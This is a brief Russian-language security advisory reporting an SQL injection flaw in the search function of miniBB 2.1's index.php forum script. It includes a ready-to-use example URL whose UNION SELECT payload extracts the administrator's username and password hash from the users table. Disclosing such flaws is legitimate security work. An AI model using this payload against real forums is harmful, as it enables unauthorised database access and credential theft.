Программа: miniBB 2.1

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:

http://[site]/[path]/index.php?action=search&where=3 &searchGo=1&table=[SQL] http://[site]/[path]/index.php?action=search&where=3&searchGo=1& table=minibbtable_posts/**/LIMIT/**/0/**/UNION/**/SELECT/**/hex(concat(username, 0x20,user_password))/**/FROM/**/minibbtable_users/* */WHERE/**/user_id=1/*



Оставить мнение